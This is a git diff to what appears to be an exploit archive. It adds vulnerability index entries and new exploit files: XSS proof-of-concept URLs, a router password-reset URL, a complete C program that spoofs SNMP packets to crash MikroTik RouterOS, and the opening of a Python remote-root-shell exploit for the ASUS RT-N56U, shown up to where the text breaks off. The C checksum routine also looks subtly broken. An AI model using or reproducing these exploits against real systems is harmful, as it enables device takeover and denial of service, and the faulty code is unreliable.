diff --git a/files.csv b/files.csv
index f8b91ca39..f96bcf99e 100755
--- a/files.csv
+++ b/files.csv
@@ -27711,6 +27711,7 @@ id,file,description,date,author,platform,type,port
30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0
30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0
+30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0
30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0
30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 search/index.php URL XSS",2007-11-10,Doz,php,webapps,0
30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
@@ -27727,6 +27728,7 @@ id,file,description,date,author,platform,type,port
30891,platforms/php/webapps/30891.txt,"Flyspray 0.9.9 Multiple Cross-Site Scripting Vulnerabilities",2007-12-09,"KAWASHIMA Takahiro",php,webapps,0
30892,platforms/php/webapps/30892.txt,"Neuron News 1.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2007-12-17,"hadihadi & black.shadowes",php,webapps,0
30893,platforms/php/webapps/30893.txt,"PHP Security Framework Multiple Input Validation Vulnerabilities",2007-12-17,DarkFig,php,webapps,0
+30894,platforms/linux/dos/30894.txt,"PeerCast 0.12 HandshakeHTTP Multiple Buffer Overflow Vulnerabilities",2007-12-17,"Luigi Auriemma",linux,dos,0
30895,platforms/linux/remote/30895.pl,"Perl Net::DNS 0.48/0.59/0.60 DNS Response Remote Denial of Service Vulnerability",2007-12-17,beSTORM,linux,remote,0
30896,platforms/multiple/dos/30896.txt,"Appian Business Process Management Suite 5.6 Remote Denial of Service Vulnerability",2007-12-17,"Chris Castaldo",multiple,dos,0
30897,platforms/windows/remote/30897.html,"iMesh 7 'IMWebControl' ActiveX Control Code Execution Vulnerability",2007-12-17,rgod,windows,remote,0
@@ -27738,6 +27740,7 @@ id,file,description,date,author,platform,type,port
30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0
30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0
30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0
+30907,platforms/linux/remote/30907.txt,"Adobe Flash Player 7.0.x/8.0.x/9.0.x ActiveX Control 'navigateToURL' API Cross Domain Scripting Vulnerability",2007-12-18,"Adam Barth",linux,remote,0
30908,platforms/windows/remote/30908.txt,"SoapUI 4.6.3 - Remote Code Execution",2014-01-14,"Barak Tawily",windows,remote,0
30909,platforms/php/webapps/30909.html,"Auto Classifieds Script 2.0 - Add Admin CSRF Vulnerability",2014-01-14,"HackXBack ",php,webapps,80
30910,platforms/php/webapps/30910.txt,"PHPJabbers Job Listing Script - Multiple Vulnerabilities",2014-01-14,"HackXBack ",php,webapps,80
@@ -27764,6 +27767,7 @@ id,file,description,date,author,platform,type,port
30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0
30932,platforms/php/webapps/30932.txt,"Logaholic profiles.php newconfname Parameter XSS",2007-12-24,malibu.r,php,webapps,0
30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
+30934,platforms/windows/dos/30934.txt,"Total Player 3.0 M3U File Denial of Service Vulnerability",2007-12-25,"David G.M.",windows,dos,0
30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0
@@ -27772,6 +27776,8 @@ id,file,description,date,author,platform,type,port
30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0
30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
+30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
+30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0
30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80
30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0
@@ -27797,6 +27803,8 @@ id,file,description,date,author,platform,type,port
30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
+30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0
+30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0
30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0
30975,platforms/cgi/webapps/30975.txt,"W3-mSQL Error Page Cross-Site Scripting Vulnerability",2008-01-03,vivek_infosec,cgi,webapps,0
@@ -27812,6 +27820,9 @@ id,file,description,date,author,platform,type,port
30985,platforms/linux/dos/30985.txt,"'libcdio' 0.7x GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
30987,platforms/php/webapps/30987.txt,"netRisk 1.9.7 'index.php' Remote File Include Vulnerability",2008-01-04,S.W.A.T.,php,webapps,0
30988,platforms/php/webapps/30988.txt,"Rotabanner Local 2/3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0
+30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 'msvcrt.dll' Exception Handling Remote Denial Of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
+30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
+30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0
30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0
30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0
30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0
@@ -27819,6 +27830,7 @@ id,file,description,date,author,platform,type,port
30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
30997,platforms/php/webapps/30997.txt,"eTicket 1.5.5.2 admin.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0
30998,platforms/linux/remote/30998.py,"SynCE 0.92 'vdccm' Daemon Remote Command Injection Vulnerability",2008-01-07,"Alfredo Ortega",linux,remote,0
+30999,platforms/windows/local/30999.txt,"Creative Ensoniq PCI ES1371 WDM Driver 5.1.3612 Local Privilege Escalation Vulnerability",2008-01-07,"Ruben Santamarta ",windows,local,0
31000,platforms/php/webapps/31000.txt,"SysHotel On Line System 'index.php' Local File Include Vulnerability",2008-01-08,p4imi0,php,webapps,0
31001,platforms/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 'admin/index.html' Cross-Site Scripting Vulnerability",2008-01-08,Ekin0x,php,webapps,0
31002,platforms/linux/dos/31002.txt,"xine-lib <= 1.1.9 'rmff_dump_cont()' Remote Heap Buffer Overflow Vulnerability",2008-01-09,"Luigi Auriemma",linux,dos,0
@@ -27835,6 +27847,7 @@ id,file,description,date,author,platform,type,port
31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53
31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80
31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80
+31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0
31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 'install.php' Cross Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0
31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0
31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 'index.php' Cross Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0
@@ -27847,6 +27860,8 @@ id,file,description,date,author,platform,type,port
31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
+31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution Vulnerability",2008-01-16,"Luigi Auriemma",windows,remote,0
+31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80
31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
@@ -27886,3 +27901,34 @@ id,file,description,date,author,platform,type,port
31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
+31074,platforms/php/webapps/31074.txt,"Nucleus CMS <= 3.22 'action.php' Cross-Site Scripting Vulnerability",2008-01-20,"Alexandr Polyakov",php,webapps,0
+31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0
+31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0
+31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
+31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
+31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
+31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
+31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
+31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
+31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
+31084,platforms/php/webapps/31084.txt,"Archimede Net 2000 'E-Guest_show.php' SQL Injection Vulnerability",2008-02-01,"Sw33t h4cK3r",php,webapps,0
+31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80
+31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Stored XSS",2014-01-20,"Saeed reza Zamanian",php,webapps,80
+31087,platforms/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Stored XSS Vulnerability",2014-01-20,"Rakesh S",hardware,webapps,80
+31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80
+31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack-based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0
+31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 'catalog.php' Cross-Site Scripting Vulnerability",2008-02-02,Crackers_Child,php,webapps,0
+31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0
+31093,platforms/php/webapps/31093.txt,"ITechClassifieds ViewCat.php CatID Parameter SQL Injection",2008-02-02,Crackers_Child,php,webapps,0
+31094,platforms/php/webapps/31094.txt,"ITechClassifieds ViewCat.php CatID Parameter XSS",2008-02-02,Crackers_Child,php,webapps,0
+31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
+31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0
+31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 'search.php' Cross-Site Scripting Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0
+31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 Remote Authentication Buffer Overflow Vulnerability",2008-02-04,L4teral,multiple,dos,0
+31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting Vulnerability",2008-02-04,Smasher,php,webapps,0
+31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 SNMP SET Denial of Service Vulnerability",2008-02-04,ShadOS,hardware,dos,0
+31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
+31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
+31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0
diff --git a/platforms/asp/webapps/31103.txt b/platforms/asp/webapps/31103.txt
new file mode 100755
index 000000000..37d249e47
--- /dev/null
+++ b/platforms/asp/webapps/31103.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27610/info
+
+AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[installdir]/operator/article/article_search_results.asp?txtSearch=">
"
\ No newline at end of file
diff --git a/platforms/asp/webapps/31104.txt b/platforms/asp/webapps/31104.txt
new file mode 100755
index 000000000..16dd69a1a
--- /dev/null
+++ b/platforms/asp/webapps/31104.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27610/info
+
+AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/[installdir]/operator/article/article_attachment.asp?Attach_Id="
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31081.txt b/platforms/cgi/webapps/31081.txt
new file mode 100755
index 000000000..bcdfc5242
--- /dev/null
+++ b/platforms/cgi/webapps/31081.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27535/info
+
+OpenBSD bgplg is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+bgplg shipped with OpenBSD 4.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/bgplg?cmd=show+version
\ No newline at end of file
diff --git a/platforms/hardware/dos/31102.c b/platforms/hardware/dos/31102.c
new file mode 100755
index 000000000..0856a5484
--- /dev/null
+++ b/platforms/hardware/dos/31102.c
@@ -0,0 +1,204 @@
+source: http://www.securityfocus.com/bid/27599/info
+
+MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users.
+
+This issue affects versions up to and including RouterOS 3.2.
+
+/* --------------------------------------------------------------------------
+* (c) ShadOS 2008
+* _ _ _ _ _ __ _ _ _
+* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
+* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
+* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
+* hellknights.void.ru |___/ .0x48k.
+*
+* --------------------------------------------------------------------------
+*
+* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
+* Don't forget to visit our site and my homepage for new releases:
+* http://hellknights.void.ru
+* http://shados.freeweb7.com
+* Also, you can mail me any bugs or suggestions:
+* mailto: shados /at/ mail /dot/ ru
+*
+* Thanks 2 antichat.ru and all my friends.
+* --------------------------------------------------------------------------
+*
+* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
+*
+* This program is free software; you can redistribute it and/or modify
+* it under the terms of the GNU General Public License as published by
+* the Free Software Foundation; either version 2, or (at your option)
+* any later version.
+*
+* This program is distributed in the hope that it will be useful,
+* but WITHOUT ANY WARRANTY; without even the implied warranty of
+* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+* GNU General Public License for more details.
+*
+* You should have received a copy of the GNU General Public License
+* along with this program; if not, write to the Free Software Foundation,
+* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+*
+* --------------------------------------------------------------------------
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+char evilcode[] = {
+0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
+};
+
+
+unsigned short in_cksum(addr, len)
+u_short *addr;
+int len;
+{
+ register int nleft = len;
+ register u_short *w = addr;
+ register int sum = 0;
+ u_short answer = 0;
+
+ while (nleft > 1) {
+ sum += *w++;
+ sum += *w++;
+ nleft -= 2;
+ }
+ if (nleft == 1) {
+ *(u_char *) (&answer) = *(u_char *) w;
+ sum += answer;
+ }
+ sum = (sum >> 17) + (sum & 0xffff);
+ sum += (sum >> 17);
+ answer = -sum;
+ return (answer);
+}
+
+int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
+{
+ char *packet;
+ struct sockaddr_in dstaddr;
+ struct iphdr *ip;
+ struct udphdr *udp;
+ packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
+ memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
+ if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
+ ip = (struct iphdr *)packet;
+ udp = (struct udphdr *)(packet+sizeof(struct iphdr));
+ ip->saddr = *saddr;
+ ip->daddr = *daddr;
+ ip->version = 4;
+ ip->ihl = 5;
+ ip->ttl = 255;
+ ip->id = htons((unsigned short) rand());
+ ip->protocol = IPPROTO_UDP;
+ ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
+ ip->check = in_cksum(ip, sizeof(struct iphdr));
+ udp->source = htons(sport);
+ udp->dest = htons(dport);
+ udp->len = htons(sizeof(struct udphdr) + len);
+ memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
+ dstaddr.sin_family = AF_INET;
+ dstaddr.sin_addr.s_addr = *daddr;
+ if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
+ perror("sendto() failed");
+ free(packet);
+}
+
+char * makereq(char *community,int *size)
+{
+ char *buf;
+ char *ptr;
+ int len;
+ int i;
+
+ len = 5 + strlen(community) + sizeof(evilcode);
+ buf = (char *)malloc(len);
+ ptr = buf;
+
+ *ptr++ = 0x30;
+ *ptr++ = len;
+
+ /* Snmp Version */
+ *ptr++ = 0x02;
+ *ptr++ = 0x01;
+ *ptr++ = 0x00;
+
+ /* Community */
+ *ptr++ = 0x04;
+ *ptr++ = strlen(community);
+ strcpy(ptr,community);
+ ptr = ptr + strlen(community);
+
+
+ *ptr++ = 0xa3; /* Set Request */
+
+ memcpy(ptr, evilcode, sizeof(evilcode));
+ ptr = ptr + sizeof(evilcode);
+
+ *size = len+2;
+ return buf;
+}
+
+int erexit(char *msg)
+{
+ printf("%s\n",msg);
+ exit (-1) ;
+}
+
+int usage()
+{
+ printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
+}
+
+int main(int argc, char **argv)
+{
+ char *saddr,*daddr,*community;
+ unsigned char *buf;
+ int size;
+ int sock;
+ unsigned long lsaddr,ldaddr;
+ int i;
+
+ saddr = NULL;
+ daddr = NULL;
+ if (argc != 7) { usage(); erexit("not enough args\n"); }
+
+ if (!strcmp(argv[1],"-s"))
+ saddr = strdup(argv[2]);
+ if (!strcmp(argv[3],"-d"))
+ daddr = strdup(argv[4]);
+ if (!strcmp(argv[5],"-c"))
+ community = strdup(argv[6]);
+
+ printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);
+
+ if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
+ erexit("Invalid source/destination IP address\n");
+
+ if (saddr == NULL) { usage(); erexit("No Source Address"); }
+ if (daddr == NULL) { usage(); erexit("No Dest Address"); }
+
+ sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
+ if (sock == -1)
+ erexit("Couldnt open Raw socket!(Are you root?)\n");
+
+ lsaddr = inet_addr(saddr);
+ ldaddr = inet_addr(daddr);
+
+ buf = makereq(community,&size);
+
+ sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
+ fprintf(stdout,"Sent packet. SNMPd must be down.\n");
+ return 0;
+
+}
diff --git a/platforms/hardware/remote/31078.txt b/platforms/hardware/remote/31078.txt
new file mode 100755
index 000000000..a8405783f
--- /dev/null
+++ b/platforms/hardware/remote/31078.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27516/info
+
+Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.
+
+Unauthenticated attackers can leverage this issue to change the password of arbitrary user accounts on the router. Successful attacks will completely compromise affected devices.
+
+2Wire routers that have the 'H04_POST' page are affected by this issue.
+
+UPDATE: This BID has been retired because it has been found to be a duplicate of BID 27246 (2Wire Routers Cross-Site Request Forgery Vulnerability).
+
+UPDATE (February 1, 2008): This BID is being reinstated. Further investigation and new information reveal that this vulnerability differs from the one described in BID 27246.
+
+http://www.example.com/xslt?PAGE=H04_POST&PASSWORD=admin&PASSWORD_CONF=admin
\ No newline at end of file
diff --git a/platforms/hardware/webapps/31033.py b/platforms/hardware/webapps/31033.py
new file mode 100755
index 000000000..77fe18ab2
--- /dev/null
+++ b/platforms/hardware/webapps/31033.py
@@ -0,0 +1,256 @@
+#!/usr/bin/env python
+
+from time import sleep
+from sys import exit
+import urllib2, signal, struct, base64, socket, ssl
+
+# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
+# [*] Discovered and Reported: October 2013
+# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
+# [*] Contact: Twitter - @rootHak42
+# [*] Software Vendor: http://asus.com
+# [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
+# [*] Software: httpd (Listens on TCP/80 and TCP/443)
+# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
+# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
+#
+# [*] Overview:
+# Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
+# supplemental applications. This install process is handled by the routers web server,
+# and is susceptible to multiple Buffer Overflow attacks.
+#
+# Vulnerable Web Page: APP_Installation.asp
+# Vulnerable HTML Parameters: apps_name, apps_flag
+# Vulneralbe Source File: web.c of httpd code
+# *Firmware versions prior to the tested version were vulnerable to this attack.
+#
+
+
+def fingerPrint(host, port, netSock):
+
+ fprint = ["RT-N56U"]
+ found = None
+ print " [*] Preparing to fingerprint the server."
+ try:
+ print " [*] Connecting to %s on port %d." % (host, port)
+ netSock.connect((host, port))
+ except Exception as error:
+ print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
+ exit(0)
+
+ try:
+ print " [*] Sending fingerprint request."
+ netSock.send("HEAD / HTTP/1.1\r\n\r\n")
+ netData = netSock.recv(1024)
+ except Exception as error:
+ print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
+ exit(0)
+
+ try:
+ print " [*] Closing network socket.\n"
+ netSock.close()
+ except Exception as error:
+ print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
+
+ for item in fprint:
+ if item in netData:
+ print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
+ sleep(1)
+ found = item
+ if found == None:
+ print " [!!!] Server banner doesn't match available targets. [!!!]\n"
+ sleep(1)
+ exit(0)
+ else:
+ return found
+
+
+def targURL():
+
+ while True:
+
